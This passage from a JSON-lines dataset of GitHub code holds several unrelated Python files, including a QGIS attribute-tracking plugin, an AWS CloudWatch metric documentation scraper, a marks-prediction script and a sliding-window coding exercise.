...\")\n\t\tself.__extract_sub_seqs()\n","repo_name":"hain222/bio-pipe","sub_path":"lib/blast.py","file_name":"blast.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"8388639463","text":"#THIS IS THE FILE WHERE YOU CREATE A EXECUTABLE FILE OF MAIN LOGIC (PART 1 FILE) WHICH WILL USE FURTHER WHILE CREATING AN USER-INTERFACE.\r\n#IN THAT SIMPLY WE HAVE TO IMPORT THE FILE.\r\nimport pickle\r\n\r\nwith open(\"sm.model\", \"rb\") as f:\r\n\tmodel = pickle.load(f)\r\n\r\n#prediction\r\nno_courses = float(input(\"Enter the no of courses : \"))\r\nti_std = float(input(\"Enter the time you study in a day (in hr) : \"))\r\nmarks = model.predict([[no_courses, ti_std]])\r\nprint(\"\\n================================Marks obtained=============================\\n\")\r\nprint(\"If you studied \",no_courses, \"courses for the \", ti_std, \"hr per day then you will score \", marks, \"marks.\")\r\n","repo_name":"Rohanpophale/ML-FLASK-BASED-STUDENT-MARKS-PREDICTION-WEB-APPLICATION","sub_path":"PART 2.py","file_name":"PART 2.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5962870097","text":"from qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication\nfrom qgis.PyQt.QtGui import QIcon\nfrom qgis.PyQt.QtWidgets import QAction\nfrom qgis.core import Qgis\nfrom qgis.utils import iface\nfrom qgis.core import QgsProject\nfrom qgis.core import QgsMapLayer\nfrom qgis.core import QgsVectorLayer\nfrom qgis.core import QgsWkbTypes\nfrom qgis.core import QgsField\nfrom qgis.core import QgsDefaultValue\nfrom qgis.core import QgsMessageLog\nfrom qgis.gui import QgsMessageBar\nfrom qgis.PyQt.QtCore import QVariant\n\n# Initialize Qt resources from file resources.py\nfrom .resources import *\nimport os.path\n\ndef checkAttributes(layer, geometryType):\n\n # Check if layer is editable\n if not layer.isEditable():\n if(not layer.startEditing()):\n iface.messageBar().pushMessage(\"Error\", \"Layer is not editable\", level=Qgis.Critical, duration=5)\n exit\n # Check if author is present\n checkAttribute(layer, 'author','Author', QVariant.String, '@user_full_name', False)\n checkAttribute(layer, 'created','Date Created', QVariant.DateTime, 'now()', False)\n checkAttribute(layer, 'updated','Date Updated', QVariant.DateTime, 'now()', True)\n\n if geometryType == QgsWkbTypes.LineGeometry:\n checkAttribute(layer, 'length','length', QVariant.Int, '$length', True)\n updateAttribute(layer, 'length')\n \n if geometryType == QgsWkbTypes.PolygonGeometry:\n checkAttribute(layer, 'area','area', QVariant.Double, 'round($area/10000,4)', True)\n updateAttribute(layer, 'area')\n \n layer.updateFields()\n #Save the changes\n layer.commitChanges()\n\n\ndef setReadOnlyAttribute(layer, attribute_index):\n form_config = layer.editFormConfig()\n form_config.setReadOnly(attribute_index, True)\n layer.setEditFormConfig(form_config)\n\ndef checkAttribute(layer, attribute_name, alias, attribute_type, default_value, applyOnUpdate, readOnly = True):\n # Check if attribute is present\n attributeIndex = layer.fields().indexFromName(attribute_name)\n aliasIndex = layer.fields().indexFromName(alias)\n if attributeIndex == -1 and aliasIndex == -1:\n print(\"Layer\" + layer.name() + \" does not have attribute \" + attribute_name + \" or alias \" + alias)\n # If the attribute isn't present and the alias is also not present, create the column\n if (layer.addAttribute(QgsField(attribute_name, attribute_type))):\n print(\"Layer\" + layer.name() + \" created attribute \" + attribute_name)\n attributeIndex = layer.fields().indexFromName(attribute_name) \n setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly)\n #Set the friendly alias for the layer\n setAlias(layer, attributeIndex, alias)\n #Because Shapefiles are a piece of crap....\n elif (attribute_type == QVariant.DateTime):\n print(\"Layer\" + layer.name() + \" created attribute \" + attribute_name + \" as a Date, as it did not create it as a DateTime, possibly because the file is a shapefile\")\n checkAttribute(layer, attribute_name,alias, QVariant.Date, default_value, applyOnUpdate, readOnly)\n else:\n iface.messageBar().pushMessage(\"Error\", \"Error creating attribute \" + attribute_name, level=Qgis.Critical, duration=5)\n exit\n else:\n attributeIndex = max(attributeIndex, aliasIndex)\n # If the attribute is present already, confirm the data type\n if layer.fields().field(attributeIndex).type() != attribute_type:\n # If the data type is wrong, delete the column and create it again\n\n #Check whether the data type is a DateTime, but the column is a Date\n if (layer.fields().field(attributeIndex).type() == QVariant.Date and attribute_type == QVariant.DateTime):\n print(\"Layer\" + layer.name() + \" has attribute \" + attribute_name + \" as a Date, so it may be a shapefile, we'll just make sure the default value is set\")\n setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly)\n \n #Otherwise, delete the column and create it again\n elif (layer.deleteAttribute(attributeIndex)):\n \n if (layer.addAttribute(QgsField(attribute_name, attribute_type))):\n attributeIndex = layer.fields().indexFromName(attribute_name)\n print(\"Layer\" + layer.name() + \" created attribute \" + attribute_name + \"After deleting the previous, because the data types didn't match\")\n #Set the default values for the form\n setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly)\n # Set the default values for existing geometry\n updateAttribute(layer, attribute_name)\n else:\n # If the data type is correct, set the default values for the form\n print(\"Layer\" + layer.name() + \" has attribute \" + attribute_name + \" with the correct data type, so we're just going to update the default values\")\n setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly)\n\n#Set the attributes to the default value for existing geometry\ndef updateAttribute(layer, attribute_name):\n attributeIndex = layer.fields().indexFromName(attribute_name)\n if attributeIndex != -1:\n for feat in layer.getFeatures():\n layer.changeAttributeValue(feat.id(), attributeIndex, 0)\n\ndef setDefaultValues(layer, attributeIndex, default_value, applyOnUpdate, readOnly = True):\n layer.setDefaultValueDefinition(attributeIndex, QgsDefaultValue(default_value,applyOnUpdate=applyOnUpdate))\n if readOnly:\n setReadOnlyAttribute(layer, attributeIndex)\n\ndef setAlias(layer, attributeIndex, alias):\n layer.setFieldAlias(attributeIndex, alias)\n\nclass eTracability:\n \"\"\"QGIS Plugin Implementation.\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'eTracability_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n QCoreApplication.installTranslator(self.translator)\n\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u'&eTracability Automatic Accountability Tracker')\n\n # Check if plugin was started the first time in current QGIS session\n # Must be set in initGui() to survive plugin reloads\n self.first_start = None\n\n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('eTracability', message)\n\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n # Adds plugin icon to Plugins toolbar\n self.iface.addToolBarIcon(action)\n\n if add_to_menu:\n self.iface.addPluginToVectorMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\"\n\n icon_path = ':/plugins/e_tracability/icon.png'\n self.add_action(\n icon_path,\n text=self.tr(u'eTraceability - Current layer'),\n callback=self.run_single,\n parent=self.iface.mainWindow())\n\n # Icon for multi-layer processing\n icon_path = ':/plugins/e_tracability/iconmultiple.png'\n self.add_action(\n icon_path,\n text=self.tr(u'eTraceability - All layers'),\n callback=self.run,\n parent=self.iface.mainWindow())\n \n # will be set False in run()\n self.first_start = True\n\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n for action in self.actions:\n self.iface.removePluginVectorMenu(\n self.tr(u'&eTraceability Automatic Accountability Tracker'),\n action)\n self.iface.removeToolBarIcon(action)\n\n\n def run(self):\n project = QgsProject.instance()\n # Get the layers\n layerList = project.mapLayers()\n\n for layer in layerList.values():\n if layer.type() == QgsMapLayer.VectorLayer:\n checkAttributes(layer, layer.geometryType())\n iface.messageBar().pushMessage(\"eTraceability\", \"Done!\", level=Qgis.Info, duration=5)\n\n def run_single(self):\n project = QgsProject.instance()\n # Get current layer\n layer = self.iface.activeLayer()\n if layer.type() == QgsMapLayer.VectorLayer:\n checkAttributes(layer, layer.geometryType())\n iface.messageBar().pushMessage(\"eTraceability\", \"Done!\", level=Qgis.Info, duration=5)","repo_name":"Skipper-is/qgis_eTracability","sub_path":"e_tracability/e_tracability.py","file_name":"e_tracability.py","file_ext":"py","file_size_in_byte":11692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7314500947","text":"import pycountry\n\nCITY_STATES = ['Monaco', 'Singapore', 'Vatican City', 'Ceuta', 'Melilla',\n 'Hong Kong', 'Macau', 'Gibraltar', 'Abu Dhabi', 'Ajman', 'Dubai',\n 'Fujairah', 'Ras Al Khaimah', 'Sharjah', 'Umm Al Quwain',\n 'Basel-Stadt', 'Berlin', 'Hamburg', 'Bremen']\n\nCONTINENTS = ['Asia', 'Africa', 'America', 'North America', 'South America',\n 'Europe', 'Antarctica', 'Australia']\n\nEXCEPTIONS = ['England', 'Scotland', 'Wales', 'Curaçao', 'Curacao',\n 'Sint Maarten']\n\ndef is_not_city(s):\n\n if s in CITY_STATES:\n return False\n\n if s in CONTINENTS:\n return True\n\n for cntry in pycountry.countries:\n if s == cntry.name:\n return True\n\n if s in EXCEPTIONS:\n return True\n\n return False\n","repo_name":"deb17/nearby-places","sub_path":"server/app/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12691662994","text":"import os\nimport cv2\nbase_dir = '/home/jiaheng/Desktop/GitHub/IJB-C-1/GT'\n\nf = open('template_fq.txt','r')\nout = f.readlines()\nfor line in out:\n _ = line.split(' ')\n # print(_)\n id = _[0]\n _ = _[1].split('/')\n filename = _[-1]\n # print(filename)\n filename = filename.replace('txt', 'jpg').rstrip('\\n')\n img_path = os.path.join(base_dir, str(id)) + '/img' + '/' + filename\n print(img_path)\n img_cv2 = cv2.imread(img_path)\n # print(img_cv2.shape)\n # cv2.imshow('', img_cv2)\n # cv2.waitKey(0)\n break\n","repo_name":"JiaHeng-DLUT/IJB-C","sub_path":"insightface/deploy/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"26220208397","text":"# There are also AWS docs in markdown format at https://github.com/awsdocs but more complex\n# metric descriptions had formatting errors and sometimes linked out to the HTML docs themselves.\n\n# https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/aws-services-cloudwatch-metrics.html\nimport argparse\nimport re\nfrom abc import abstractmethod\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom textwrap import dedent\nfrom typing import Set, List, Mapping\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tabulate import tabulate\n\nRE_WHITESPACE = re.compile(r\"\\s+\")\nRE_REMOVE_PARENS = re.compile(r\"^\\(.*\\)\")\n\n\ndef _clean_whitespace(s):\n \"\"\"Replaces consecutive whitespace with a single space anywhere inside the string.\"\"\"\n return RE_WHITESPACE.sub(\" \", s).strip()\n\n\ndef _remove_parens(s):\n \"\"\"Removes all text inside parenthesis at the beginning of the string\"\"\"\n return RE_REMOVE_PARENS.sub(\"\", s).strip()\n\ndef _replace_brackets(s):\n \"\"\"Replace brackets with parenthesis because it breaks the UI\"\"\"\n # It probably thinks the brackets are markdown or something.\n return s.replace(\"[\", \"(\").replace(\"]\", \")\").strip()\n\n\n@dataclass\nclass Metric:\n name: str\n brief: str\n\n\nclass Extractor:\n @abstractmethod\n def extract(self, html) -> List[Metric]:\n pass\n\n\ndef get_description(desc):\n clean, *rest = _replace_brackets(_remove_parens(_clean_whitespace(desc.text))).split(\".\")\n\n if clean.endswith(\".\"):\n return clean\n else:\n return clean + \".\"\n\n\nclass TableExtractor(Extractor):\n \"\"\"Pulls metrics from a that has at least the columns \"Metric\" and \"Description\" (but maybe more which\n will be ignored. \"\"\"\n # Sometimes Metric header has trailing whitespace.\n METRIC_HEADER = re.compile(r\"Metric\\s*\")\n\n def extract(self, html) -> List[Metric]:\n # Find all the table headers with a value of Metric.\n for metric_header in html.find_all(\"th\", text=self.METRIC_HEADER):\n # Go up the tree to the table element.\n table = metric_header.parent.parent\n # Iterate through all the table rows, skipping the first one\n # which is the table header.\n for row in table.find_all(\"tr\")[1:]:\n metric, raw_desc, *_, = row.find_all(\"td\")\n desc = get_description(raw_desc)\n\n # Sometimes there will be more than one metric in the table with the same description.\n for metric in metric.text.split(\",\"):\n yield Metric(metric.strip(), desc)\n\n\nclass ListExtractor(Extractor):\n \"\"\"Pulls metrics that are in an HTML description list (
)\"\"\"\n\n def extract(self, html) -> List[Metric]:\n # Assume all dt and dd elements are metric names and descriptions respectively.\n for metric, raw_desc in zip(html.find_all(\"dt\"), html.find_all(\"dd\")):\n desc = get_description(raw_desc)\n yield Metric(metric.text.strip(), desc)\n\n\nLIST = ListExtractor()\nTABLE = TableExtractor()\n\n\n@dataclass\nclass DocSet:\n \"\"\"Specifies a set of URLs to fetch and an extractor that can extract metrics from them\"\"\"\n extractor: Extractor\n urls: Set[str]\n\n\nDOCS: Mapping[str, List[DocSet]] = {\n \"alb\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-cloudwatch-metrics.html\"}),\n ],\n \"api-gateway\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-metrics-and-dimensions.html\",\n })\n ],\n \"autoscaling\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-instance-monitoring.html\",\n })\n ],\n \"cloudfront\": [\n DocSet(TABLE,\n {\"https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/monitoring-using-cloudwatch.html\"})\n ],\n \"dynamodb\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/metrics-dimensions.html\",\n })\n ],\n \"ebs\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/monitoring-volume-status.html\"\n })\n ],\n \"ec2\": [\n DocSet(TABLE,\n {\"https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/viewing_metrics_with_cloudwatch.html\"})\n ],\n \"ecs\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/AmazonECS/latest/developerguide/cloudwatch-metrics.html\"})\n ],\n \"elasticache\": [\n DocSet(TABLE,\n # Make this a list so that the order is deterministic. There are some duplicate events across\n # ElasticCache Redis and memcache so we just pick one.\n [\"https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/CacheMetrics.Redis.html\",\n \"https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/CacheMetrics.HostLevel.html\",\n \"https://docs.aws.amazon.com/AmazonElastiCache/latest/mem-ug/CacheMetrics.Memcached.html\",\n \"https://docs.aws.amazon.com/AmazonElastiCache/latest/mem-ug/CacheMetrics.HostLevel.html\"\n ]),\n ],\n \"elb\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-cloudwatch-metrics.html\"})\n ],\n \"kinesis\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/streams/latest/dev/monitoring-with-cloudwatch.html\"})\n ],\n \"lambda\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/lambda/latest/dg/monitoring-functions-metrics.html\"})\n ],\n \"opsworks\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/opsworks/latest/userguide/monitoring-cloudwatch.html\"})\n ],\n \"rds\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/MonitoringOverview.html\"})\n ],\n \"redshift\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/redshift/latest/mgmt/metrics-listing.html\"})\n ],\n \"route53\": [\n DocSet(LIST, {\"https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/monitoring-cloudwatch.html\",\n \"https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/monitoring-resolver-with-cloudwatch.html\"}),\n ],\n \"sns\": [\n DocSet(TABLE, {\"https://docs.aws.amazon.com/sns/latest/dg/sns-monitoring-using-cloudwatch.html\"})\n ],\n \"sqs\": [\n DocSet(TABLE, {\n \"https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-available-cloudwatch-metrics.html\"})\n ],\n}\n\n\nclass Fetcher:\n def __init__(self):\n self._sess = requests.Session()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n def fetch(self, url: str, extractor: Extractor) -> List[Metric]:\n data = self._sess.get(url).content\n tree = BeautifulSoup(data, \"html.parser\")\n return list(extractor.extract(tree))\n\n def close(self):\n self._sess.close()\n\n\ndef sync(name, metrics):\n \"\"\"Write markdown docs\"\"\"\n for metric in metrics:\n mdFile = f\"{metric.name}.md\"\n docs = Path().resolve().parent / f\"aws-{name}\" / \"docs\"\n docs.mkdir(exist_ok=True)\n\n (docs / mdFile).write_text(dedent(f\"\"\"\n ---\n title: {metric.name}\n brief: {metric.brief}\n metric_type:\n ---\n ### {metric.name}\n\n {metric.brief}\n \"\"\").strip() + \"\\n\")\n\n\ndef show(name, metrics):\n \"\"\"Show metrics in a table format\"\"\"\n print(tabulate(sorted(((m.name, m.brief) for m in metrics), key=lambda x: x[0]),\n headers=(\"Metric\", \"Description\"), tablefmt=\"github\"))\n\n\ndef main(only=None, cmd_show=False, cmd_sync=False):\n with Fetcher() as f:\n for integration, docsets in DOCS.items():\n if only is not None and integration not in only:\n continue\n\n metrics = []\n metrics_seen = set()\n\n for docset in docsets:\n for url in docset.urls:\n new_metrics = f.fetch(url, docset.extractor)\n new_metric_set = {m.name for m in new_metrics}\n\n if len(metrics_seen & new_metric_set) != 0:\n print(f\"WARNING: Duplicate metrics {new_metric_set & metrics_seen}\")\n\n metrics_seen.update(new_metric_set)\n metrics += new_metrics\n\n if cmd_show:\n show(integration, metrics)\n\n if cmd_sync:\n sync(integration, metrics)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"\"\"AWS metric documentation importer\n\nsync: output contents to meta.yaml files\nshow: print contents in a table format\"\"\", formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"action\", choices=(\"sync\", \"show\"), help=\"see program description\")\n parser.add_argument(\"--only\", nargs=\"+\", help=\"run only the specified integrations\")\n args = parser.parse_args()\n main(args.only, args.action == \"show\", args.action == \"sync\")\n","repo_name":"sunset3000/integrations","sub_path":"aws-import/awsimport.py","file_name":"awsimport.py","file_ext":"py","file_size_in_byte":9091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"17098692620","text":"# coding=utf-8\nfrom math import cos\nfrom math import radians\n\nfrom osem.general.enerapi.base.base import Base\nfrom osem.general import conf\nfrom osem.general.enerapi.common.Guard import *\n\n__author__ = 'VincentRoch'\n\n\nclass SolarFunctionRadianceOntoTiltedPlane(Base):\n \"\"\"\n Calculate direct and diffuse solar radiance onto a tilted plane with free orientation and slope from\n horizontal direct and diffuse radiance\n \"\"\"\n\n _default_parameter_value = {\n \"albedo\": 0.2\n }\n\n @staticmethod\n def help():\n return SolarFunctionRadianceOntoTiltedPlane.__doc__ + \"\\r\\n\" + \\\n SolarFunctionRadianceOntoTiltedPlane.calculate.__doc__\n\n @staticmethod\n def help_calculate():\n return SolarFunctionRadianceOntoTiltedPlane.__init__.__doc__.format(\n SolarFunctionRadianceOntoTiltedPlane._default_parameter_value[\"albedo\"]\n )\n\n def __init__(self, args):\n \"\"\"\n Arguments should be an object of the form:\n\n {{\"GbeamH\": 850.4, \"GdiffuseH\": 126.3, \"dayOfYear\": 158,\n \"incidentAngle\": 32.3, \"zenithAngle\": 23.6,\n \"slope\": 45.0, \"albedo\": 0.2}}\n\n {{\n GbeamH [W/m2] (positive float)\n GdiffuseH [W/m2] (positive float)\n dayOfYear [day] (integer between 1\n and 365)\n incidentAngle [deg.] (0 smaller equal than\n float smaller equal than 180)\n zenithAngle [deg.] (0 smaller equal than\n float smaller equal than 180)\n slope [deg.] (0 smaller equal than\n float smaller equal than 180)\n albedo [-] (0 smaller float)\n default: {0},\n }}\n \"\"\"\n\n super(SolarFunctionRadianceOntoTiltedPlane, self).__init__(args)\n\n Guard.check_if_key_in_dict(\"GbeamH\", args)\n Guard.check_if_key_in_dict(\"GdiffuseH\", args)\n Guard.check_if_key_in_dict(\"dayOfYear\", args)\n Guard.check_if_key_in_dict(\"incidentAngle\", args)\n Guard.check_if_key_in_dict(\"zenithAngle\", args)\n Guard.check_if_key_in_dict(\"slope\", args)\n\n Guard.check_is_higher(args[\"GbeamH\"], lower_limit=0)\n Guard.check_is_higher(args[\"GdiffuseH\"], lower_limit=0)\n Guard.check_is_higher(args[\"albedo\"], lower_limit=0, strict=True)\n Guard.check_value_in_between(args[\"dayOfYear\"], min=1, max=365)\n Guard.check_value_in_between(args[\"incidentAngle\"], min=0, max=180)\n Guard.check_value_in_between(args[\"zenithAngle\"], min=0, max=180)\n Guard.check_value_in_between(args[\"slope\"], min=0, max=180)\n\n self.args = args\n pass\n\n def calculate(self):\n \"\"\"\n\n The returned object is of the form:\n {\n \"GbeamTiltedPlane\": [W/m2] (0 smaller equal than float)\n \"GdiffuseTiltedPlane\": [W/m2] (0 smaller equal than float)\n \"GtotalTiltedPlane\": [W/m2] (0 smaller equal than float)\n }\n\n Detailed Description:\n\n *********************************************************************\n Inputs:\n *********************************************************************\n GbeamH (Gbh) [W/m2] Beam solar radiation onto a horizontal surface\n (0 smaller equal than GbeamH)\n GdiffuseH (Gdh) [W/m2] Diffuse solar radiation onto a horizontal surface\n (0 smaller equal than GdiffuseH)\n dayOfYear (n) [day] Day of the year (1 smaller equal than dayOfYear smaller equal than 365)\n incidentAngle (t) [deg.] Angle of incidence, the angle between the beam radiation on a surface and\n the normal to that surface (0 smaller equal than IncidentAngle\n smaller equal than 180)\n zenithAngle (tz) [deg.] Angle between the vertical and the line to the sun, that is, the angle of\n incidence of beam radiation on a horizontal surface (cf. \"Zenith angle\"\n hereunder).(0 smaller equal than zenithAngle smaller equal than 180)\n slope (b) [deg.] Angle between the plane of the surface in question and the horizontal;\n (0 smaller equal than slope smaller equal than 180).(slope bigger than 90\n means that the surface has a downward-facing component.)\n albedo (alb) [-] Ground albedo or ground reflection factor (0 smaller than albedo)\n\n\n *********************************************************************\n Outputs:\n *********************************************************************\n GbeamTiltedPlane [W/m2] Beam solar radiation onto a tilted surface of slope \"slope\"\n (0 smaller equal than GbeamTiltedPlane)\n GdiffuseTiltedPlane [W/m2] Diffuse solar radiation onto a tilted surface of slope \"slope\"\n (0 smaller equal than GbeamTiltedPlane)\n GtotalTiltedPlane [W/m2] Total solar radiation onto a tilted surface of slope \"slope\",\n GtotalTiltedPlane = GbeamTiltedPlane + GdiffuseTiltedPlane\n (0 smaller equal than GtotalTitledPlane)\n\n *********************************************************************\n Notes:\n *********************************************************************\n All calculations are taken from [1]\n The \"_r\" appended to variables means in Radians\n\n\n *********************************************************************\n Reference:\n *********************************************************************\n [1] B. Perers, P. Kovacs, M. Olsson, and M. P. U. Pettersson, \"A Tool for Standardized Collector Performance\n Calculations including PVT\" Energy Procedia, vol. 30, pp. 1354-1364, 2012.\n\n\n \"\"\"\n n = self.args[\"dayOfYear\"]\n Gbh = float(self.args[\"GbeamH\"])\n Gdh = float(self.args[\"GdiffuseH\"])\n b = float(self.args[\"slope\"])\n alb = float(self.args[\"albedo\"])\n t = float(self.args[\"incidentAngle\"])\n tz = float(self.args[\"zenithAngle\"])\n\n t_r = radians(t)\n tz_r = radians(tz)\n b_r = radians(b)\n\n # Conversion factor between the normal direction to the sun and the collector plane\n if t < 90 and tz < 90:\n Rb = cos(t_r)/cos(tz_r) # [1]\n else:\n Rb = 0\n\n # Extraterrestrial solar radiation on horizontal surface\n Go = 1367 * (1 + 0.033 * cos(radians(360*n/365))) * cos(tz_r) # [1]\n\n # Anisotropy index (how large fraction of the diffuse radiation that is circumsolar)\n Ai = Gbh/Go # [1]\n\n # total solar radiation onto a horizontal surface\n Gth = Gbh + Gdh\n\n # The total radiation onto a tilted plane according to the Hay and Davies model\n Gtt = Gbh*Rb + Gdh*Ai*Rb + Gdh*(1-Ai)*0.5*(1+cos(b_r)) + Gth*alb*0.5*(1-cos(b_r)) # [1]\n\n Gbt = Gbh*Rb\n Gdt = Gtt - Gbt\n\n return {\n \"GbeamTiltedPlane\": Gbt,\n \"GdiffuseTiltedPlane\": Gdt,\n \"GtotalTiltedPlane\": Gtt\n }\n\n def get_reference(self):\n\n return conf.ref_solar_function_onto_tilted_plane\n","repo_name":"CREM-APP/OSEM","sub_path":"osem/natural_resources/solar/solar_function_radiance_onto_tilted_plane.py","file_name":"solar_function_radiance_onto_tilted_plane.py","file_ext":"py","file_size_in_byte":7694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13612076020","text":"# coding: utf-8\n# Problem: Given an array of positive numbers and a positive number ‘s’, \n# find the length of the smallest contiguous subarray whose sum is greater than or equal to ‘S’. \n# Return 0, if no such subarray exists.\n# Example input: [2, 1, 5, 2, 3, 2], S=7 \n# Leetcode Equivalent: https://leetcode.com/problems/minimum-size-subarray-sum/\n# Optimal solution: O(n) The outer for loop runs for all elements and the inner while loop processes each element only once, therefore the time complexity of the algorithm will be O(N+N)O(N+N) which is asymptotically equivalent to O(N)O(N).\n\ndef minSubArrayLen(self, array, s):\n windowSum, windowStart = 0.0, 0 \n minWindow = 9999999\n\n for windowEnd in range(0, len(array)): # to increase the window size while we move forward\n windowSum += array[windowEnd] # to increase the sum of the window\n while(windowSum >= s): # keep decreasing the window and try to find the most minimal size that satisfies our condition\n minWindow = min(windowEnd - windowStart + 1, minWindow) \n windowSum -= array[windowStart] # when the window slides the first element gets cut from the sum\n windowStart += 1 # shifting the window over\n \n if minWindow == 9999999:\n return 0\n return minWindow\n\nif __name__ == \"__main__\":\n print(minSubArrayLen([2,3,1,2,4,3], 7))\n","repo_name":"kingpreyansh/grokking-the-coding-interview","sub_path":"1. Sliding Window/3_smallest_subarray_with_sum.py","file_name":"3_smallest_subarray_with_sum.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27567139818","text":"from sqlalchemy.orm import Session\nfrom model import models\n\ndef create_answer(question_id: int, content: str, answer_number: int, db: Session):\n exist_answer = db.query(models.Answer) \\\n .filter(models.Answer.answer_number == answer_number)\\\n .filter(models.Answer.question_id == question_id).first()\n \n if exist_answer is not None:\n db.delete(exist_answer)\n db_answer = models.Answer(\n question_id = question_id,\n answer_number = answer_number,\n content = content\n )\n db.add(db_answer)\n db.commit()\n db.refresh(db_answer)\n return True","repo_name":"NXTung1102000/Graduation-Thesis-2023","sub_path":"back-end/service/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"17927070047","text":"from crawlers import RankingCrawler\nfrom models import RankingCategory\nimport time\n\nspreadsheet = \"Penny Stalkers\"\ncrawler = RankingCrawler(\n user_client=\"tommy\", spreadsheet=spreadsheet, category=RankingCategory.MOST_ACTIVE\n)\ncrawler.scrape_trending_value(sheet=\"MostActive_MessageCount\")\ncrawler.scrape_price_and_follower_count(\n price_sheet=\"MostActive_Price\", 